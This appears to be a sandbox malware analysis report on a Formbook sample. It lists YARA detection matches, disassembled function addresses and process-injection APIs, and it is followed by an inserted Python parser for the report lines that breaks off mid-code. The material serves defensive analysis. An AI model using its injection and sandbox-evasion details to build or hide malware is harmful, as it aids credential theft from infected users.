Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2564dd8.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2505e58.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\Public\vbc.exe Code function: 4_2_00500970 4_2_00500970
Source: C:\Users\Public\vbc.exe Code function: 4_2_00509BD0 4_2_00509BD0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00500BC0 4_2_00500BC0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00509BC0 4_2_00509BC0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00500BB1 4_2_00500BB1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C0E1 5_2_0041C0E1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C985 5_2_0041C985
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BA8F 5_2_0041BA8F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C37B 5_2_0041C37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CBED 5_2_0041CBED
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C45D 5_2_0041C45D
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C8B 5_2_00408C8B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C90 5_2_00408C90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D88 5_2_00402D88
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C75C 5_2_0041C75C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C905A 5_2_007C905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B3040 5_2_007B3040
Source: C:\Users\Public\vbc.exe Code function: 5_2_007DD005 5_2_007DD005
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AE0C6 5_2_007AE0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AE2E9 5_2_007AE2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00851238 5_2_00851238
Source: C:\Users\Public\vbc.exe Code function: 5_2_007FA37B 5_2_007FA37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B7353 5_2_007B7353
Source: C:\Users\Public\vbc.exe Code function: 5_2_008563BF 5_2_008563BF
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B2305 5_2_007B2305
Source: C:\Users\Public\vbc.exe Code function: 5_2_007D63DB 5_2_007D63DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AF3CF 5_2_007AF3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_007ED47D 5_2_007ED47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083443E 5_2_0083443E
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C1489 5_2_007C1489
Source: C:\Users\Public\vbc.exe Code function: 5_2_007E5485 5_2_007E5485
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F6540 5_2_007F6540
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B351F 5_2_007B351F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026B1238 7_2_026B1238
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260E2E9 7_2_0260E2E9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0265A37B 7_2_0265A37B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02617353 7_2_02617353
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02612305 7_2_02612305
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260F3CF 7_2_0260F3CF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026363DB 7_2_026363DB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026B63BF 7_2_026B63BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02613040 7_2_02613040
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0262905A 7_2_0262905A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0263D005 7_2_0263D005
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260E0C6 7_2_0260E0C6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026B2622 7_2_026B2622
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0265A634 7_2_0265A634
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0261E6C1 7_2_0261E6C1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02614680 7_2_02614680
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026457C3 7_2_026457C3
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0261C7BC 7_2_0261C7BC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0269579A 7_2_0269579A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0264D47D 7_2_0264D47D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02645485 7_2_02645485
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02621489 7_2_02621489
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02656540 7_2_02656540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0261351F 7_2_0261351F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0262C5F0 7_2_0262C5F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026C3A83 7_2_026C3A83
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02637B00 7_2_02637B00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0269DBDA 7_2_0269DBDA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260FBD7 7_2_0260FBD7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026BCBA4 7_2_026BCBA4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0263286D 7_2_0263286D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0261C85C 7_2_0261C85C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026AF8EE 7_2_026AF8EE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02695955 7_2_02695955
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026269FE 7_2_026269FE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026129B2 7_2_026129B2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026B098E 7_2_026B098E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0262EE4C 7_2_0262EE4C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02642E2F 7_2_02642E2F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0263DF7C 7_2_0263DF7C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02620F3F 7_2_02620F3F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0261CD5B 7_2_0261CD5B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02640D3B 7_2_02640D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026AFDDD 7_2_026AFDDD
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008C0D9 7_2_0008C0D9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008C45D 7_2_0008C45D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008C75C 7_2_0008C75C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008C985 7_2_0008C985
Source: C:\Users\Public\vbc.exe Code function: String function: 007F3F92 appears 39 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007ADF5C appears 39 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007F373B appears 74 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0260E2A8 appears 38 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0265373B appears 238 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 02653F92 appears 108 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0267F970 appears 81 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0260DF5C appears 118 times
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185F0 NtCreateFile, 5_2_004185F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004186A0 NtReadFile, 5_2_004186A0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418720 NtClose, 5_2_00418720
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187D0 NtAllocateVirtualMemory, 5_2_004187D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185EE NtCreateFile, 5_2_004185EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041871C NtClose, 5_2_0041871C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0078 NtResumeThread,LdrInitializeThunk, 5_2_007A0078
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_007A0048
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A00C4 NtCreateFile,LdrInitializeThunk, 5_2_007A00C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A07AC NtCreateMutant,LdrInitializeThunk, 5_2_007A07AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079F900 NtReadFile,LdrInitializeThunk, 5_2_0079F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079F9F0 NtClose,LdrInitializeThunk, 5_2_0079F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0079FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0079FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0079FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0079FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0079FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0079FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0079FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0079FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0079FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0079FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0079FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0060 NtQuerySection, 5_2_007A0060
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A10D0 NtOpenProcessToken, 5_2_007A10D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A1148 NtOpenThread, 5_2_007A1148
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A010C NtOpenDirectoryObject, 5_2_007A010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A01D4 NtSetValueKey, 5_2_007A01D4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026000C4 NtCreateFile,LdrInitializeThunk, 7_2_026000C4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026007AC NtCreateMutant,LdrInitializeThunk, 7_2_026007AC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_025FFAD0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_025FFAE8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_025FFAB8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFB50 NtCreateKey,LdrInitializeThunk, 7_2_025FFB50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_025FFB68
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_025FFBB8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FF900 NtReadFile,LdrInitializeThunk, 7_2_025FF900
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FF9F0 NtClose,LdrInitializeThunk, 7_2_025FF9F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_025FFED0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFFB4 NtCreateSection,LdrInitializeThunk, 7_2_025FFFB4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_025FFC60
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_025FFDC0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFD8C NtDelayExecution,LdrInitializeThunk, 7_2_025FFD8C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02600060 NtQuerySection, 7_2_02600060
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02600078 NtResumeThread, 7_2_02600078
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02600048 NtProtectVirtualMemory, 7_2_02600048
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026010D0 NtOpenProcessToken, 7_2_026010D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02601148 NtOpenThread, 7_2_02601148
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260010C NtOpenDirectoryObject, 7_2_0260010C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026001D4 NtSetValueKey, 7_2_026001D4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFA50 NtEnumerateValueKey, 7_2_025FFA50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFA20 NtQueryInformationFile, 7_2_025FFA20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFBE8 NtQueryVirtualMemory, 7_2_025FFBE8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FF8CC NtWaitForSingleObject, 7_2_025FF8CC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02601930 NtSetContextThread, 7_2_02601930
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FF938 NtWriteFile, 7_2_025FF938
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFE24 NtWriteVirtualMemory, 7_2_025FFE24
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFEA0 NtReadVirtualMemory, 7_2_025FFEA0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFF34 NtQueueApcThread, 7_2_025FFF34
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFFFC NtCreateProcessEx, 7_2_025FFFFC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFC48 NtSetInformationFile, 7_2_025FFC48
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02600C40 NtGetContextThread, 7_2_02600C40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFC30 NtOpenProcess, 7_2_025FFC30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFC90 NtUnmapViewOfSection, 7_2_025FFC90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFD5C NtEnumerateKey, 7_2_025FFD5C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02601D80 NtSuspendThread, 7_2_02601D80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_000885F0 NtCreateFile, 7_2_000885F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_000886A0 NtReadFile, 7_2_000886A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_00088720 NtClose, 7_2_00088720
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_000887D0 NtAllocateVirtualMemory, 7_2_000887D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_000885EE NtCreateFile, 7_2_000885EE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008871C NtClose, 7_2_0008871C
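The "Code function" listing above is the report's static view of which ntdll entry points each process can reach, and it is the raw material behind the injection verdicts in this report (process hollowing, APC queuing, thread context modification). A practitioner reading a sandbox report like this one usually wants that list collapsed per process and compared against the API sets the injection primitives need. The following Python is an added example, not part of the Joe Sandbox report; it parses the report's own line format, with a subset of the lines from process 5 (vbc.exe) and process 7 (cscript.exe) embedded as sample input. The technique names and their API sets are this example's own grouping, and a hit only means the code path exists in the disassembly, not that it executed.

```python
import ntpath
import re
from collections import defaultdict

# Added example, not part of the sandbox report: parse the report's
# "Code function" lines and summarise which native (Nt*) APIs each process
# reaches. The sample below is copied from this report's own listing for
# process 5 (vbc.exe) and process 7 (cscript.exe); a subset is enough.
REPORT_LINES = r"""
Source: C:\Users\Public\vbc.exe Code function: 5_2_00851238 5_2_00851238
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0078 NtResumeThread,LdrInitializeThunk, 5_2_007A0078
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0079FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0079FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A01D4 NtSetValueKey, 5_2_007A01D4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02601930 NtSetContextThread, 7_2_02601930
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFE24 NtWriteVirtualMemory, 7_2_025FFE24
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFF34 NtQueueApcThread, 7_2_025FFF34
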